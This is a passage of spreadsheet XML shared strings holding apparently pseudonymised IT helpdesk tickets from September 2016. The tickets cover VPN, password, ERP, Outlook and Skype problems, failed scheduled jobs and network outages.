    <t>cannot syncronize outlook appointments to crm</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lzycofut.mzbovhpd@gmail.com_x000D_
_x000D_
dear it help team,_x000D_
_x000D_
hi._x000D_
_x000D_
i cannot synchronize appointments nor press anything from outlook crm tag like attached picture below._x000D_
_x000D_
please help me out._x000D_
_x000D_
_x000D_
[cid:image001.jpg@01SID_35036.5992ff90]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>lzycofut mzbovhpd</t>
  </si>
  <si>
    <t>foreign trade data missing in the inwarehouse_tool</t>
  </si>
  <si>
    <t>inwarehouse_tool 0159130578 was blocked in the system for foreign data were missing in item 20 and 30. after first analysis, infos were available in mm 03 for both concerned materials- inwarehouse_tool is now completed but could you check what happened in order to avoid futur issues (was material correctly entered in mm03, any steps missing ? was there a erp incident that leads to this issue ?...)</t>
  </si>
  <si>
    <t>question</t>
  </si>
  <si>
    <t xml:space="preserve">hello bobhyb,
sorry, i don't know more than this.
i am copying this to help team, if they could help you further.
</t>
  </si>
  <si>
    <t>vpn access issue</t>
  </si>
  <si>
    <t xml:space="preserve">hello team,
yvhlenaz ptuqhrwk (on cc) cannot connect to vpn.
he can access to 
but once he tries to connect vpn, small window (below pictures) shows up shortly and disconnected.
(second picture says "discconect")
i checked device manager, but i could not find "other devices" in his pc.
other network adapters have lauacyltoe hxgaycze drivers.
please give us your advice.
âˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆž
xmgptwho fmcxikqz k.k.
æµ…é‡Ž å¥ / takheghshi afefsano
âˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆž
</t>
  </si>
  <si>
    <t>yvhlenaz ptuqhrwk</t>
  </si>
  <si>
    <t>password blocked</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wrelsfqa.qfwosjkh@gmail.com
good morning
please can you unblock user nieghjyukea. we tried using password_management_tool id password manager, but it does not want to work. she cannot get into the system at all.
kind </t>
  </si>
  <si>
    <t>wrelsfqa qfwosjkh</t>
  </si>
  <si>
    <t xml:space="preserve">user tuzkadxv rxloutpn cannot use the "run report" </t>
  </si>
  <si>
    <t xml:space="preserve">hello team,_x000D_
_x000D_
user tuzkadxv rxloutpn is trying to use the "run report" functionality in the opportstorage_product =&gt; opportstorage_product report, which is a 1-page summary of the opportstorage_product, but it does not return any data for him, just a blank screen. . i could not find out why it is happening. _x000D_
could you help me how to troubleshoot in this matheywter?_x000D_
_x000D_
the screenshot is taken by me, not the user, just to illustrate which functionality i am talking about. i do not have a screenshot from the user yet, but it is not workng for him on ny of his opportunities. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1332 failed in job_scheduler at: 09/16/2016 02:46:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1332 failed in job_scheduler at: 09/16/2016 02:46:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3049 failed in job_scheduler at: 09/16/2016 02:16:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
193ftp error: put zmm_bestand_stl.dat_x000D_
_x000D_
job Job_3049 failed in job_scheduler at: 09/16/2016 02:16:00</t>
  </si>
  <si>
    <t>carrier information lost when bulk indicator is removed  and multiple line delivery can't be processed in kis â€“ carrier ip</t>
  </si>
  <si>
    <t>ship method information is lost when bulk shipment indicator is removed  and   multiple line delivery can't be processed in kis â€“ carrier ipd</t>
  </si>
  <si>
    <t>telephony_software  break down</t>
  </si>
  <si>
    <t xml:space="preserve">when shutdown the computer yesterday, the windows update wasload. i could not stop the update._x000D_
so telephony_software  must be fixed.  _x000D_
see these informations:_x000D_
_x000D_
all,_x000D_
we have been identifying the update which is causing the issue._x000D_
when updating your computer disable kb4283716 from the lists with updates._x000D_
_x000D_
in case it happened anyway, have it to remove it._x000D_
_x000D_
urvitans laqdwvgo_x000D_
cec analyst operational excellence emea _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>qdczywsh ofzvapwn</t>
  </si>
  <si>
    <t>network outage: usa: site hard down since at 1:13 am et on 09/16.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______1:13 am et on 09/16._______________x000D_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</si>
  <si>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gtehdnyushot kennconnect problem </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dxnskvbm.xbaswghy@gmail.com_x000D_
_x000D_
hello ,_x000D_
_x000D_
i changed my password yesterday._x000D_
i can open kennconnect &amp; log in but things have changed :_x000D_
my favorites dierppeared ._x000D_
it asks to input customer but Â«customer s  search Â» does not work ._x000D_
opening favorites, it says to call helpdesk ._x000D_
_x000D_
please call aerp so i am able to work today ._x000D_
_x000D_
_x000D_
[gtehdnyushot capture]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>dxnskvbm xbaswghy</t>
  </si>
  <si>
    <t>milano,italy: duplex mismatch  gi2/0/1 on 1811 router and gi0/0/1 on 4331 router. see discription for more info.</t>
  </si>
  <si>
    <t xml:space="preserve">duplex mismatch: duplex mode on interface gigabitethernet2/0/1 Â· uplink to company-eu-ita-milano-dmvpn-1811-rtr01 on company-eu-ita-milan-g12-3750-core-stack-sw01.company.com is half. check duplex configuration on both end devices of the link and make sure the duplex mode matches._x000D_
_x000D_
duplex mismatch: duplex mode on interface gigabitethernet0/0/1 Â· " connection to lan " on company-eu-ita-milano-dmvpn-4331-rtr01.company.com is full. check duplex configuration on both end devices of the link and make sure the duplex mode matches._x000D_
</t>
  </si>
  <si>
    <t>urgent! mm 2122084 // dn 9169293441 //pt. indonesia pratma</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: aqrhwjgo.cyelqkvs@gmail.com_x000D_
_x000D_
dear it team,_x000D_
_x000D_
could you please check and advise from where cost on the attached shipping inwarehouse_tool is? as per standard cost, it is only usd 0.04 per piece but it is deusad on shipping document sgd 67.89 (usd 49.55). this matheywter effects a customer to pay high cost of import duty._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>unable to connect vpn at home.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qmkpsbgl.zfovlrah@gmail.com_x000D_
_x000D_
hello company help,_x000D_
_x000D_
could you please check my laptop settings because  i am getting inconsistent company vpn connection at home ?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>dcsaiweo qvstjlem</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap2 failed in job_scheduler at: 09/15/2016 23:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap2 failed in job_scheduler at: 09/15/2016 23:33:00</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xosycftu.olhpmsdw@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
my erp is locked._x000D_
please unlock._x000D_
i used password_management_tool password manager to unlock my account._x000D_
i can use vpn, but can not log in erp_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">not able to connect to the erp </t>
  </si>
  <si>
    <t>vRxKDhIB sqTVbvkm</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3052 failed in job_scheduler at: 09/15/2016 22:09:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
193ftp connection error to system HostName_514  _x000D_
_x000D_
job Job_3052 failed in job_scheduler at: 09/15/2016 22:09:00</t>
  </si>
  <si>
    <t>unable to submit reports in engineering tool.</t>
  </si>
  <si>
    <t>unable to submit reports in engineering tool. please refer to the screenshots.</t>
  </si>
  <si>
    <t>qxmujhwg rsgqidxw</t>
  </si>
  <si>
    <t xml:space="preserve">outlook has stopped working </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gzqijaoc.rfywvloa@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i need your help aerp_x000D_
outlook has stopped working in pc._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">cant open photos from iphone </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: eylqgodm.ybqkwiam@gmail.com_x000D_
_x000D_
[cid:image001.png@01SID_35008.716912e0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">job SID_39hotf failed in job_scheduler at: 09/15/2016 20:07:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_39hotf failed in job_scheduler at: 09/15/2016 20:07:00</t>
  </si>
  <si>
    <t>dell 7350: skype audio not working</t>
  </si>
  <si>
    <t xml:space="preserve">dell 7350: skype audio not working._x000D_
-connected to the user system using teamviewer._x000D_
-updated the bios on the user system._x000D_
-restarted the system._x000D_
-skype audio is now working (uacyltoe hxgaycze call with user_x000D_
-will call the user back tomorrow and check on the issue._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job bk_hana_SID_62_arc_dp failed in job_scheduler at: 09/15/2016 19:28:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_hana_SID_62_arc_dp failed in job_scheduler at: 09/15/2016 19:28:00</t>
  </si>
  <si>
    <t>_x000D_
login issue_x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-checked the user name in ad and unlocked the account._x000D_
-advised the user to login and check._x000D_
-caller confirmed that she was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>user unable to login to the pc.</t>
  </si>
  <si>
    <t>user unable to login  to the pc._x000D_
-checked ad and infotrmed user account is not locked._x000D_
-advised the user to login and check._x000D_
-caller confirmed that she was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>distributor_tool login issue</t>
  </si>
  <si>
    <t>gjzqctph otwylgdj</t>
  </si>
  <si>
    <t>what is the collaboration_platform link?</t>
  </si>
  <si>
    <t>name:grtaoivq dwjvfkqe
language:
browser:microsoft internet explorer
email:grtaoivq.dwjvfkqe@gmail.com
customer number:
telephone:
summary:what is the collaboration_platform link?</t>
  </si>
  <si>
    <t>kbdljsxf kcmqtjgf</t>
  </si>
  <si>
    <t xml:space="preserve">create express stock transiit for mm 7234728 order 35023051 cnc art </t>
  </si>
  <si>
    <t xml:space="preserve">hi it, _x000D_
can you please help check why, i don't see any error on our side. </t>
  </si>
  <si>
    <t>user is trying to install the software on a customer pc.</t>
  </si>
  <si>
    <t>user is trying to install the software on a customer pc.
-connected to the user system using teamviewer.
-user able to login to the distributor_tool and go to engineering_tool tab to install the software.
-unable to install the software on the user system.
-customer email id: smitctdrhell@ims.supply
-c#:</t>
  </si>
  <si>
    <t xml:space="preserve">jvshydix rzpmnylt : general query </t>
  </si>
  <si>
    <t>mm02: when grade changed on material, engineering tool is not validated if 'save/delete' is selected</t>
  </si>
  <si>
    <t>when mm02 is used to change the grade on a rqfhiong zkwfqagb logic executes that verifies if the engineering tool is valid for the new grade.    this is working correctly if 'save' is selected on the catalog id/ grade screen.  if 'save/delete' is selected the logic is not working and invalid engineering tool values are being left on rqfhiong zkwfqagbs.   _x000D_
_x000D_
this is affecting all users not just one.   logic needs corrected for 'save/ delete'</t>
  </si>
  <si>
    <t xml:space="preserve">user wanted to speak to some one in usa and asked for jashyht contact # </t>
  </si>
  <si>
    <t>unable to log in to skype</t>
  </si>
  <si>
    <t>sto for notion order //mm 3493130</t>
  </si>
  <si>
    <t>ticket update on inplant_860558</t>
  </si>
  <si>
    <t xml:space="preserve">cant connect to erp : vpn issue </t>
  </si>
  <si>
    <t>i am getting this error when trying to open a hana file.  can you help?</t>
  </si>
  <si>
    <t>erp excel add in issue.</t>
  </si>
  <si>
    <t xml:space="preserve"> the terminate action for mdulwthb sldowapb has completed.</t>
  </si>
  <si>
    <t>erp log in issue</t>
  </si>
  <si>
    <t>usa plant power outage saturday 9/17/16 6:30am - 2:00pm</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ekjobdiz.ktelzwvg@gmail.com_x000D_
_x000D_
everyone,_x000D_
               the power will be off to the whole usa manufacturing plant on saturday, 9/17/16 from 6:30am until 2:00pm. the generator should keep the computer room running. switches located in remote network closets will drop and turn back on when the power resumes._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ekjobdiz ktelzwvg</t>
  </si>
  <si>
    <t>called to unlock ad account for user qcxivzag vyucbagx</t>
  </si>
  <si>
    <t>bvwepigr ekmarvgd</t>
  </si>
  <si>
    <t>dell 7350: system very slow.mscrm slow.</t>
  </si>
  <si>
    <t xml:space="preserve">dell 7350: system very slow.
-connected to the user system using teamviewer.
-cleared the cache, cookies, temp files.
-updated the symantec on the user.
-updated the system bios.
-restarted the pc.
-advised the user to try again and check.
--user launched mscrm and its was working fine.
-issue resolved.
-c: 
 </t>
  </si>
  <si>
    <t xml:space="preserve">change skirtylset percentages </t>
  </si>
  <si>
    <t xml:space="preserve">change skirtylset percentages effective 9/19/2016. see list attached </t>
  </si>
  <si>
    <t>printer setrup</t>
  </si>
  <si>
    <t>id01 printer setup</t>
  </si>
  <si>
    <t>printer driver update</t>
  </si>
  <si>
    <t>ybpeiolu cneoghxp</t>
  </si>
  <si>
    <t>outlook not getting connected.</t>
  </si>
  <si>
    <t xml:space="preserve">audio not working : driver issue </t>
  </si>
  <si>
    <t>zyheqclo mrznuplg</t>
  </si>
  <si>
    <t>windows accout lockout</t>
  </si>
  <si>
    <t>incorrect vendor in po extract</t>
  </si>
  <si>
    <t xml:space="preserve">can you please do me a favor and check the po extract file for po 5616741012 and check which vendor has been assigned._x000D_
_x000D_
this is because the po is assigned to vendor 2111220700 in erp, but rr shows vendor 2111100659. see attachment for screen prints._x000D_
</t>
  </si>
  <si>
    <t>reisekosten error</t>
  </si>
  <si>
    <t>network outage :south amerirtca site is hard down at 11:50 am et on 09/15. no backup circuit at the site.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____slo_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________11:50 am et on 09/15______________x000D_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____na____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _____na______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _____na______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  __na___     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>ethics issue.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fmzdkyqv.dbrslnhe@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
i still cannot access the beec module, see message below â€“ please correct â€“ </t>
  </si>
  <si>
    <t xml:space="preserve">not able to apply job in company portal in : external user </t>
  </si>
  <si>
    <t>working from home, connection to vpn gets disconnected</t>
  </si>
  <si>
    <t>i continue to get disconnected from vpn and have to reconnect multiple times a day</t>
  </si>
  <si>
    <t>reset password user zigioachstyac- SID_1</t>
  </si>
  <si>
    <t>procenter login credential for new joiners</t>
  </si>
  <si>
    <t xml:space="preserve">please create procenter login credential for below new joiners.
name:vijghyduhprga yeghrrajghodu
user id:yerrav 
---------------------------------------------------
name:ulezhxfw kslocjtaaruthapandian
user id:karhjuyutk
</t>
  </si>
  <si>
    <t>how to add members to distribution groups</t>
  </si>
  <si>
    <t>muywpnof prtikusy</t>
  </si>
  <si>
    <t>skype issues</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wauhocsk.vxuikqaf@gmail.com_x000D_
_x000D_
hallo my friends_x000D_
_x000D_
i have changed password today. there was no "problem" message coming out after the password change. everything was gtehdnyu and saying ok â€“ password successfully changed_x000D_
_x000D_
now from some reasons i am not able to log in to skype for business. it is showing me following_x000D_
_x000D_
please let me know what should i do_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">call from vitalyst : error : no sections to display. note that section in a group aren't supported. one note issue </t>
  </si>
  <si>
    <t>error : no sections to display. note that section in a group aren't supported.</t>
  </si>
  <si>
    <t>re: ticket_no1551649: change ansi and iso no.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: stdiondwd.rawdwu@company.com_x000D_
_x000D_
closed the ticket!_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ticket update on ticket_no0439844</t>
  </si>
  <si>
    <t>spam mails coming in to the inbox</t>
  </si>
  <si>
    <t>aw: ticket_no1551649: change ansi and iso no.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: cbupnjzo.daflthkw@gmail.com
hello sudghhahjkkar,
would you please close this ticket.
at this moment i tried to change the ansi and iso no. and it worked very well.
please excuse the inconvenience and </t>
  </si>
  <si>
    <t>cbupnjzo daflthkw</t>
  </si>
  <si>
    <t>change in ethics</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lhejbwkc.xbmyvnqf@gmail.com_x000D_
_x000D_
dear all_x000D_
_x000D_
had a change from company to company e-mail seems that this is now creating problems with our ethnics site:_x000D_
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please make sure that i can access again._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to submit the time card</t>
  </si>
  <si>
    <t xml:space="preserve">hi team,_x000D_
_x000D_
i am unable to submit the time card(attached is the screenshot). can you please help. </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ivdntecr.cdasfpjb@gmail.com_x000D_
_x000D_
please see below error. my outlook is not updating and it is saying my password is wrong or won't connect to server. when i open the outlook programdnty i am asked to enter my credentials, but after doing so the server will not connect. i am currently using the web-based version of outlook on internet explorer._x000D_
_x000D_
_x000D_
_x000D_
[cid:0abb054c-e7fe-4304-aeea-287a1733a874]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ivdntecr cdasfpjb</t>
  </si>
  <si>
    <t>rrc email boxes</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: iauqlrjk.nijdaukz@gmail.com
good morning,
i need to be added to a couple email boxes so i have access, can you please assist?
                estfhycoastrrc@company.com&lt;mailto:estfhycoastrrc@company.com&gt;
                estfhycoastrrc@company.com&lt;mailto:estfhycoastrrc@company.com&gt;
also muywpnof prtikusy is requesting to be the owner of these email addresses so he can add people to them when needed, is this possible?
</t>
  </si>
  <si>
    <t xml:space="preserve">vpn query </t>
  </si>
  <si>
    <t xml:space="preserve">network outage : israel, israel ( sales facility) is down on 09/13 at 8:23 am et. </t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______09/13 at 8:23 am et________________x000D_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_____no    (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____na_______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___no____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</si>
  <si>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unable to log in to windows </t>
  </si>
  <si>
    <t>connect or share collaboration_platform from pc to collaboration_platform through company hub</t>
  </si>
  <si>
    <t xml:space="preserve">hello it personnel,_x000D_
_x000D_
i have used collaboration_platform 2013 saved to the local computer drive.  i would like to connect my local collaboration_platform to the collaboration_platform accessed through the office software on collaboration_platform (company's hub).  how do i connect the two locations?_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>account locked out.</t>
  </si>
  <si>
    <t>wichtig: bitte netzwerke synchronisieren !!</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nhsogrwy.qkxhbnvp@gmail.com
hallo herr dwfiykeo argtxmvcumar,
hallo it help team,
kÃ¶nnen sie bitte diese beiden netzwerke synchronisieren =&gt; sie mÃ¼ssen identisch sein!!!
aktuell stimmen die daten nicht Ã¼berein.
[cid:image001.png@01d20f62.ebe809f0]
vorab vielen dank!
mit freundlichen grÃ¼ÃŸen
mafghyrina gÃ¼ntner
specialist hr shared services
nhsogrwy.qkxhbnvp@gmail.com&lt;mailto:lixwgnto.krutnylz@gmail.com&gt;
company shared services gmbh
geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq
</t>
  </si>
  <si>
    <t>wacxhqvs nxdythgc</t>
  </si>
  <si>
    <t>reset the password for tfsehruw dzrgpkyn on erp / produktion / erp</t>
  </si>
  <si>
    <t>tfsehruw dzrgpkyn</t>
  </si>
  <si>
    <t xml:space="preserve">interface: gigabitethernet1/0/47 Â· mtb gf wirelss ap on company-ap-ind-kirty-pu9-ff-2960s-stack-sw01.company.com is down </t>
  </si>
  <si>
    <t>skype - poor quality</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: azxhejvq.fyemlavd@gmail.com
please open a ticket for me.  i have been on a few skype calls recently where the quality was very poor.  these calls were multinational with india or apac with participants in the us.  the audio quality was so poor that we could not understand each other to the point that the meeting was almost a waste of time.  also, the ability to broadcast powerpoint or erp screen images was bas as well were some of the participants of the meeting could not see the content again making the meetings a waste of our time.
mikhghytr wafglhdrhjop
sr. manager, global ethics and compliance programdntys
</t>
  </si>
  <si>
    <t>cannot log onto telephony_software</t>
  </si>
  <si>
    <t xml:space="preserve">cannot log onto telephony_software
error message : authentication process failed
telephone: </t>
  </si>
  <si>
    <t>lwbchnga axpqctfr</t>
  </si>
  <si>
    <t>laptop needs to be formatheywted</t>
  </si>
  <si>
    <t xml:space="preserve">from: sagfhosh karhtyiio 
sent: thursday, september 15, 2016 6:00 am
to: hgwofcbx tnowikyv; gmrkisxy wgtcylir
cc: sridthshar herytur; ufpzergq zchjbfdehivashankaraiah
subject: re: it asset
hi ghkkytu,
as discussed please format the laptop this needs to be given to the new joiner vijuryat dgurhtya.
i have assigned inc1551683 to your team for the same.
</t>
  </si>
  <si>
    <t>cannot connect to outlook or connect to exchange for skype, also have issue with com add in for excel</t>
  </si>
  <si>
    <t xml:space="preserve"> repeat of same issue that i have had in the past. not able to connect to outlook. also, com add in is not staying available on excel file, i have to reselect it each time i open the file.</t>
  </si>
  <si>
    <t xml:space="preserve">@5c\qerror@ 35019921rder# 35019921, material 7393495  </t>
  </si>
  <si>
    <t xml:space="preserve">@5c\qerror@ 3501992sartlgeo lhqksbdx0 "create delivery" not allowed (sys. status exls, object vb0035019921000010) @35\qlong text exists@ need to  create a delivery_x000D_
</t>
  </si>
  <si>
    <t>schyepwd ykatfphc</t>
  </si>
  <si>
    <t>can't log onto skype. changed password yesterday, won't recognize today</t>
  </si>
  <si>
    <t>xmiroedk vreqdcpw</t>
  </si>
  <si>
    <t>no folder access</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nhsogrwy.qkxhbnvp@gmail.com_x000D_
_x000D_
team,_x000D_
[cid:image001.png@01d20f3c.cb611f80]   is not working._x000D_
_x000D_
please usa access for me._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>printer problem / issue information - reroute rn33 back.</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</si>
  <si>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_x000D_
 _x000D_
   â€¢  detailed description of the problem ?   reroute rn33 back erp / has been fixed._x000D_
_x000D_
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000D_
      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000D_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</si>
  <si>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instalar docad eletronico</t>
  </si>
  <si>
    <t xml:space="preserve">user: olghiveii_x000D_
_x000D_
segue link_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>it  -  speker for skype conferences</t>
  </si>
  <si>
    <t xml:space="preserve">it - germany:_x000D_
_x000D_
skype speakers are required for confernece room 1 an the conference room behind the cantine._x000D_
therefore michghytuael hÃ¤cker confirmed to purchase the new two speakers._x000D_
xvwchsdg pladjmxt suggested to go with one bigger speaker instead._x000D_
please check the prices to allow michghytuael to compare both possibilities._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>user safghghga needs to reset her password</t>
  </si>
  <si>
    <t xml:space="preserve">hello! could you pls help me and create a new password for user id: safghghga (gabryltka sabhtyhiko)?
she blocked her computer and now she needs to access aerp.
please, contact me when you have done it.
</t>
  </si>
  <si>
    <t>mtgvfzwc cdabfghv</t>
  </si>
  <si>
    <t>problem with crm leads</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vkzwafuh.tcjnuswg@gmail.com
hi,
when i received a lead i tried to convert it into an opportstorage_product by qualifying it. when i did that i got an error. see below. please advise.
[cid:image001.jpg@01d20f1e.cd84e580]
vkzwafuh tcjnuswg - cmp
sr. application eng.
vkzwafuh.tcjnuswg@gmail.com
</t>
  </si>
  <si>
    <t>company iphone device activation</t>
  </si>
  <si>
    <t>rwiykpuc ckrmjqlx</t>
  </si>
  <si>
    <t>vip2: unable to get on the network</t>
  </si>
  <si>
    <t>printer rj0c on printer server HostName_1033 is not right for x64</t>
  </si>
  <si>
    <t>printer adds to pc fine but when trying to print continuously prints characters and symbols and that's it. when used on a x86 pc from server HostName_769 it prints fine._x000D_
printer is a laserjet 5si mx_x000D_
_x000D_
tim komar looked at this</t>
  </si>
  <si>
    <t>can not get erp to issue deliveries for 4 sto's - truck scheduled to pick up at 10:00am today</t>
  </si>
  <si>
    <t>stock is available in erp but apparently not apo.  please help to issue deliveries for  5019229515, 5019229528, 5019229548 &amp; 5019229566 to return scrap powder to powder plants.</t>
  </si>
  <si>
    <t>the fitness center digital signage pc will not connect to the network to get updates.</t>
  </si>
  <si>
    <t>cwuospin nbhoxqpe</t>
  </si>
  <si>
    <t>unable to logon to erp</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hotf failed in job_scheduler at: 09/15/2016 07:40:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hotf failed in job_scheduler at: 09/15/2016 07:40:00</t>
  </si>
  <si>
    <t>reset password user zigioachstyac - SID_34 /SID_37</t>
  </si>
  <si>
    <t>reset password user zigioachstyac - SID_34/SID_37</t>
  </si>
  <si>
    <t>wg: zeichnung 5685567645</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dnwfhpyl.zqbldipk@gmail.com
von: vgsqetbx wpkcbtjl
gesendet: donnerstag, 15. september 2016 10:41
an: dnwfhpyl zqbldipk &lt;dnwfhpyl.zqbldipk@gmail.com&gt;
betreff: zeichnung 5685567645
hallo,
ich habe wieder eine zeichnung 5685645 mit falsch aufgedruckter zeichnungsnummer bitte richtigstellen
mit freundlichen grÃ¼ÃŸen
vgsqetbx wpkcbtjl
production planner
company produktions gmbh &amp; co. kg
vgsqetbx.wpkcbtjl@gmail.com&lt;mailto:vgsqetbx.wpkcbtjl@gmail.com&gt;
geschÃ¤ftsfÃ¼hrer: dr. jofghyuach fabry, harald mÃ¤nnlein, rtnzvplq erhmuncq
von: dnwfhpyl zqbldipk
gesendet: dienstag, 16. april 2013 09:50
an: tfhzidnq wqpfdobe
cc: vgsqetbx wpkcbtjl; ksvqzmre yqnajdwh
betreff: aw: erp-plm: drawing with different drawing number
hallo heighjtyich,
ich bitte um entschuldigung wegen der falschen gdw drawing #. ein paar zeichnungen wurden 10 monate vor dem plm go-live versehentlich ein zweites mal umbenannt, nachdem sie schon konvertiert waren. die richtige plm nummer ist immer die rechts oben im druckstempel.
auch das viele eurer gescannten zeichnungen nictafvwlpz opfigqramdntyatisch nach pdf konvertiert werden konnten tut mir leid. es wurden &gt; 2.600.000 zeichnungen konvertiert und etwa 4000 davon machten probleme. ein paar hundert davon scheinen von euch zu sein. wir reparieren diese wie bisher bei bedarf.
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>dnwfhpyl zqbldipk</t>
  </si>
  <si>
    <t>not able to access email</t>
  </si>
  <si>
    <t>not able to access email._x000D_
_x000D_
itclukpe aimcfeko is his manager</t>
  </si>
  <si>
    <t>adlkywmc knzbuowr</t>
  </si>
  <si>
    <t>ehoxaltv ripteyxl</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_47arc2 failed in job_scheduler at: 09/15/2016 06:35:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_47arc2 failed in job_scheduler at: 09/15/2016 06:35:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_48arc1 failed in job_scheduler at: 09/15/2016 06:28:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_48arc1 failed in job_scheduler at: 09/15/2016 06:28:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_48arc2 failed in job_scheduler at: 09/15/2016 06:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_48arc2 failed in job_scheduler at: 09/15/2016 06:21:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_35arc2 failed in job_scheduler at: 09/15/2016 06:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_35arc2 failed in job_scheduler at: 09/15/2016 06:21:00</t>
  </si>
  <si>
